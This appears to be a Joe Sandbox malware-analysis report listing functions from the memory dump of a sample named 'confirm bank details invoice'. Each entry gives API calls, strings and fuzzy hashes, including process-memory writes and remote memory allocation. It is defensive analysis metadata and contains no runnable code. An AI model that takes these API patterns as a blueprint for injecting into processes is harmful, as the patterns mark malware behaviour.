                    • Opcode ID: 9ba5015b9f69da6531a6f191098e6056c6f8e8f394b899b6bdf707d9dfe645a7
                    • Instruction ID: 9bcb26ee56ddf1f90594ae24b13d33b6848defb1d0ddf04735989af6fdc154b9
                    • Opcode Fuzzy Hash: 9ba5015b9f69da6531a6f191098e6056c6f8e8f394b899b6bdf707d9dfe645a7
                    • Instruction Fuzzy Hash: 77F04F716012086FEB110FA4EC88E773B6EFF4A754F00003AFA41C7290CB64AC21DA75
                    APIs
                    • GetDlgItem.USER32(?,000003E9), ref: 004AEC94
                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 004AECAB
                    • MessageBeep.USER32(00000000), ref: 004AECC3
                    • KillTimer.USER32(?,0000040A), ref: 004AECDF
                    • EndDialog.USER32(?,00000001), ref: 004AECF9
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                    • String ID:
                    • API String ID: 3741023627-0
                    • Opcode ID: 7ee202abe0ffd52dedf1e6719d8231dcdc1f65eb1a531f0d039d7740dd4f3ca0
                    • Instruction ID: 84a9ce859d1698675f0d6cb65f5e1fa8235c8e3c4529a059377b0285a77efa1c
                    • Opcode Fuzzy Hash: 7ee202abe0ffd52dedf1e6719d8231dcdc1f65eb1a531f0d039d7740dd4f3ca0
                    • Instruction Fuzzy Hash: C401A430900704ABEB246B12DE4EBA677B9FF11715F00056AB593A54E1DBF8AA54CB48
                    APIs
                    • EndPath.GDI32(?), ref: 0048B0BA
                    • StrokeAndFillPath.GDI32(?,?,004EE680,00000000,?,?,?), ref: 0048B0D6
                    • SelectObject.GDI32(?,00000000), ref: 0048B0E9
                    • DeleteObject.GDI32 ref: 0048B0FC
                    • StrokePath.GDI32(?), ref: 0048B117
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Path$ObjectStroke$DeleteFillSelect
                    • String ID:
                    • API String ID: 2625713937-0
                    • Opcode ID: 922704bb090f6ea521c2bf1d6758bcae89b763daa06c658334fb59417c3a6413
                    • Instruction ID: f2d7c2689d9083f214a8653dcad4fdc8ff5c10461c40331952b61483e2e4edde
                    • Opcode Fuzzy Hash: 922704bb090f6ea521c2bf1d6758bcae89b763daa06c658334fb59417c3a6413
                    • Instruction Fuzzy Hash: FBF01D30000A44DFC721AFA5ED0E7693B65E7213A5F088315E425496F1C7344569EF6C
                    APIs
                    • CoInitialize.OLE32(00000000), ref: 004BF2DA
                    • CoCreateInstance.OLE32(004FDA7C,00000000,00000001,004FD8EC,?), ref: 004BF2F2
                    • CoUninitialize.OLE32 ref: 004BF555
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: CreateInitializeInstanceUninitialize
                    • String ID: .lnk
                    • API String ID: 948891078-24824748
                    • Opcode ID: ef0504387e3cf65278a8766d0caf2bf208c1fbde11a440e28e01c749f8a21287
                    • Instruction ID: f04e0add8bcc34273d602df6659231601f22a3eed69fc5e9d7a08e37be0a4aad
                    • Opcode Fuzzy Hash: ef0504387e3cf65278a8766d0caf2bf208c1fbde11a440e28e01c749f8a21287
                    • Instruction Fuzzy Hash: 07A12D71104201AFD300EF55C881EAFB7E8EF99718F00895EF55997192DB74E909CBA6
                    APIs
                      • Part of subcall function 0047660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004753B1,?,?,004761FF,?,00000000,00000001,00000000), ref: 0047662F
                    • CoInitialize.OLE32(00000000), ref: 004BE85D
                    • CoCreateInstance.OLE32(004FDA7C,00000000,00000001,004FD8EC,?), ref: 004BE876
                    • CoUninitialize.OLE32 ref: 004BE893
                      • Part of subcall function 0047936C: __swprintf.LIBCMT ref: 004793AB
                      • Part of subcall function 0047936C: __itow.LIBCMT ref: 004793DF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                    • String ID: .lnk
                    • API String ID: 2126378814-24824748
                    • Opcode ID: 678baafbc39fdde2d4f47466af570f5a60002b8651936a61762d8e664a351d94
                    • Instruction ID: e6e4496db859759274a72188f68fe4154207419ed82dd8d511e0fd0fcf2d4272
                    • Opcode Fuzzy Hash: 678baafbc39fdde2d4f47466af570f5a60002b8651936a61762d8e664a351d94
                    • Instruction Fuzzy Hash: 14A153756043019FCB10EF15C4849AABBE5BF88314F04899EF99A9B3A1CB35EC45CB95
                    APIs
                    • __startOneArgErrorHandling.LIBCMT ref: 004932ED
                      • Part of subcall function 0049E0D0: __87except.LIBCMT ref: 0049E10B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: ErrorHandling__87except__start
                    • String ID: pow
                    • API String ID: 2905807303-2276729525
                    • Opcode ID: 9d56c567533075426f2b0b3bbaf4056728995614e97dbf77174ef70415ca9cad
                    • Instruction ID: 3e3f0d5e32413cd7c6b90608f76f556724a2a4cf4b1b0ccb68eaa839fc41f331
                    • Opcode Fuzzy Hash: 9d56c567533075426f2b0b3bbaf4056728995614e97dbf77174ef70415ca9cad
                    • Instruction Fuzzy Hash: 39513A21A0820196CF21EF16C90537F2F949B52715F208DBBF895823E9DF3D8DC9A64E
                    APIs
                    • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0050DC50,?,0000000F,0000000C,00000016,0050DC50,?), ref: 004B4645
                      • Part of subcall function 0047936C: __swprintf.LIBCMT ref: 004793AB
                      • Part of subcall function 0047936C: __itow.LIBCMT ref: 004793DF
                    • CharUpperBuffW.USER32(?,?,00000000,?), ref: 004B46C5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: BuffCharUpper$__itow__swprintf
                    • String ID: REMOVE$THIS
                    • API String ID: 3797816924-776492005
                    • Opcode ID: ac210f47566b94eb9405867f78a73a32168c603a01c2e03842775f0dcfcd1977
                    • Instruction ID: 467ab6664603c4535305a14a5cb7e5a0e8d9201aa4e1d6ee4630aa9a92678677
                    • Opcode Fuzzy Hash: ac210f47566b94eb9405867f78a73a32168c603a01c2e03842775f0dcfcd1977
                    • Instruction Fuzzy Hash: EE417534A001199FCF01DF55C881AEEB7B5FF89308F14845AE91AAB392DB38DD45CB64
                    APIs
                      • Part of subcall function 004B430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004ABC08,?,?,00000034,00000800,?,00000034), ref: 004B4335
                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004AC1D3
                      • Part of subcall function 004B42D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004ABC37,?,?,00000800,?,00001073,00000000,?,?), ref: 004B4300
                      • Part of subcall function 004B422F: GetWindowThreadProcessId.USER32(?,?), ref: 004B425A
                      • Part of subcall function 004B422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,004ABBCC,00000034,?,?,00001004,00000000,00000000), ref: 004B426A
                      • Part of subcall function 004B422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,004ABBCC,00000034,?,?,00001004,00000000,00000000), ref: 004B4280
                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004AC240
                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004AC28D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                    • String ID: @
                    • API String ID: 4150878124-2766056989
                    • Opcode ID: 3ccc7b3414c2cd9f4ba3dac065b24d28507126d6b8eb6c8c2e5ebd27da857c45
                    • Instruction ID: 4b71d4efc9532e4d7e4a37446c52017eef0535804a533d697befadef33f5b451
                    • Opcode Fuzzy Hash: 3ccc7b3414c2cd9f4ba3dac065b24d28507126d6b8eb6c8c2e5ebd27da857c45
                    • Instruction Fuzzy Hash: 86416972A00218AFDB10DFA4CD81BEEB7B8EF59300F00409AFA45B7281DA746E45DB64
                    APIs
                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0050DC00,00000000,?,?,?,?), ref: 004DA6D8
                    • GetWindowLongW.USER32 ref: 004DA6F5
                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004DA705
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Window$Long
                    • String ID: SysTreeView32
                    • API String ID: 847901565-1698111956
                    • Opcode ID: cce45f3f7d047d7794468069bb3ea50551e1755c24e9504c09c399a07a3098d9
                    • Instruction ID: f1563bc1dcd5e075490042aa5068f5ad7c94a25439c8e4aa7b3f1ad25298a655
                    • Opcode Fuzzy Hash: cce45f3f7d047d7794468069bb3ea50551e1755c24e9504c09c399a07a3098d9
                    • Instruction Fuzzy Hash: 8631BF31500205ABDB119E74CC51BEB7BA9FF49324F18472AF875923E0C778E8609B59
                    APIs
                    • _memset.LIBCMT ref: 004C5190
                    • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 004C51C6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: CrackInternet_memset
                    • String ID: |$DL
                    • API String ID: 1413715105-3824535098
                    • Opcode ID: 83e8996b3185d313d714d416ea0311ab61970226e88dd8591ad028dd1cb99400
                    • Instruction ID: cdd32d936f173fb321d329b9ed23e53a9e1db4055e3dd3e71f5dcb915e583949
                    • Opcode Fuzzy Hash: 83e8996b3185d313d714d416ea0311ab61970226e88dd8591ad028dd1cb99400
                    • Instruction Fuzzy Hash: 4B313971C00109ABCF01AFA5CC85EEE7FB9FF18704F00405AF809A6166DB35AA46DBA4
                    APIs
                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 004DA15E
                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 004DA172
                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 004DA196
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: MessageSend$Window
                    • String ID: SysMonthCal32
                    • API String ID: 2326795674-1439706946
                    • Opcode ID: 4df4975a3fca1febfdd93fdaf3423fc233dff85be2d2eb93c20a9f1e43e3ae90
                    • Instruction ID: 5dc29bb38fff5205c0a8b1a3a952005783f9ed7b62fcad7a0d5cf28bae4e562a
                    • Opcode Fuzzy Hash: 4df4975a3fca1febfdd93fdaf3423fc233dff85be2d2eb93c20a9f1e43e3ae90
                    • Instruction Fuzzy Hash: 0F21D332500218ABDF119F94CC42FEE3B79FF48714F100216FA55AB2D0D6B9AC61CB94
                    APIs
                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 004DA941
                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 004DA94F
                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 004DA956
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: MessageSend$DestroyWindow
                    • String ID: msctls_updown32
                    • API String ID: 4014797782-2298589950
                    • Opcode ID: 17005dfa19e8c1326f91455ac1e9f147e492b821daf119e80f2d58df9bb620e5
                    • Instruction ID: 1f437c51217a08fe71c82cea96e4e40e7382ba96db1b9321be1edf3fbe7fea69
                    • Opcode Fuzzy Hash: 17005dfa19e8c1326f91455ac1e9f147e492b821daf119e80f2d58df9bb620e5
                    • Instruction Fuzzy Hash: A921C4B5600209AFDB00DF65CCA2D773BADEF5A368B04045AFA049B361CB34EC21DB65
                    APIs
                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 004D9A30
                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 004D9A40
                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 004D9A65
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: MessageSend$MoveWindow
                    • String ID: Listbox
                    • API String ID: 3315199576-2633736733
                    • Opcode ID: 2ab1533759960ed613e8ef7d9c8d349f4f6bdbfa26c242ab8f7db7f5ba6302e1
                    • Instruction ID: 247ff7899927eebc7b18cc727f439f17dc6df94383300140de1211cd5d193fbc
                    • Opcode Fuzzy Hash: 2ab1533759960ed613e8ef7d9c8d349f4f6bdbfa26c242ab8f7db7f5ba6302e1
                    • Instruction Fuzzy Hash: 4521C272610118BFEB218F54DC95FBF3BAAEF89754F01812AF9449B3A0C6759C11C7A4
                    APIs
                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 004DA46D
                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 004DA482
                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 004DA48F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID: msctls_trackbar32
                    • API String ID: 3850602802-1010561917
                    • Opcode ID: ca35617e17e0dcdabb2bcb167d431a9818626c59ba1027fc43c57e6863e84ac3
                    • Instruction ID: a7f599593d143e76b15a4b9eec43fe7ab71a8acf8d6f1f4d37123b90c41bbae2
                    • Opcode Fuzzy Hash: ca35617e17e0dcdabb2bcb167d431a9818626c59ba1027fc43c57e6863e84ac3
                    • Instruction Fuzzy Hash: EB110A71200208BEEF209F75CC49FAB3B69FF89758F01411EFA45962D1D6B5E821DB28
                    APIs
                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00492350,?), ref: 004922A1
                    • GetProcAddress.KERNEL32(00000000), ref: 004922A8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: RoInitialize$combase.dll
                    • API String ID: 2574300362-340411864
                    • Opcode ID: 725fe037b2f92161cdaaa14c82a319462418845c125ca150113f168f86d503b9
                    • Instruction ID: ed9b72d3a785025b67b18d4981f1440efaf1e7f1139db1e913aca42379df166d
                    • Opcode Fuzzy Hash: 725fe037b2f92161cdaaa14c82a319462418845c125ca150113f168f86d503b9
                    • Instruction Fuzzy Hash: DFE01A70E94300ABDF205FB0ED4DB253A66AB21702F1050A1B202D52E0DBF84059EF0C
                    APIs
                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00492276), ref: 00492376
                    • GetProcAddress.KERNEL32(00000000), ref: 0049237D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: RoUninitialize$combase.dll
                    • API String ID: 2574300362-2819208100
                    • Opcode ID: 76379f817a091c73e7b9169784295069dbf98553fbe5486ef3f54562fd8b4c08
                    • Instruction ID: b7d5d3cab4ff8105e0ba7a92c765058a7da2d7bf2ae6424a69423fc2d5f2272a
                    • Opcode Fuzzy Hash: 76379f817a091c73e7b9169784295069dbf98553fbe5486ef3f54562fd8b4c08
                    • Instruction Fuzzy Hash: DAE0B670944304ABDB706F60EE1DB253A76BB20702F111425F609D22F0DBB89428FA19
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: LocalTime__swprintf
                    • String ID: %.3d$WIN_XPe
                    • API String ID: 2070861257-2409531811
                    • Opcode ID: 671c14aa3f7e025b5f97401cf55c14c7d7207e1c329e2ba04743d73a60685b20
                    • Instruction ID: 33339519de828dba82b0dd1bb312ad72f6699c3945422ac57e46d58f48e12870
                    • Opcode Fuzzy Hash: 671c14aa3f7e025b5f97401cf55c14c7d7207e1c329e2ba04743d73a60685b20
                    • Instruction Fuzzy Hash: CBE012B1C04659DBCB109792DD05DFA777CAB04742F2004D3F906A2050D63DABA6EB1B
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,004D21FB,?,004D23EF), ref: 004D2213
                    • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 004D2225
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetProcessId$kernel32.dll
                    • API String ID: 2574300362-399901964
                    • Opcode ID: e5658362f42c6fc2ff4354adb5f9fb795de7e7698d2a137bbcc0bd5e3b1af7a7
                    • Instruction ID: 6cf6938a0bb7c6fdeb8c455875c6480d3f29e15aa0fb4e4fdfcefd52f0da3287
                    • Opcode Fuzzy Hash: e5658362f42c6fc2ff4354adb5f9fb795de7e7698d2a137bbcc0bd5e3b1af7a7
                    • Instruction Fuzzy Hash: 53D0A7349007229FC7214F30FA086127AD9FF15310F00487BF895E2390E7B4D880DA54
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,00000000,004742EC,?,004742AA,?), ref: 00474304
                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00474316
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                    • API String ID: 2574300362-1355242751
                    • Opcode ID: bbfad8aa261702e94026511695e7dff532d27bb5fbd839c39904aab231b07e11
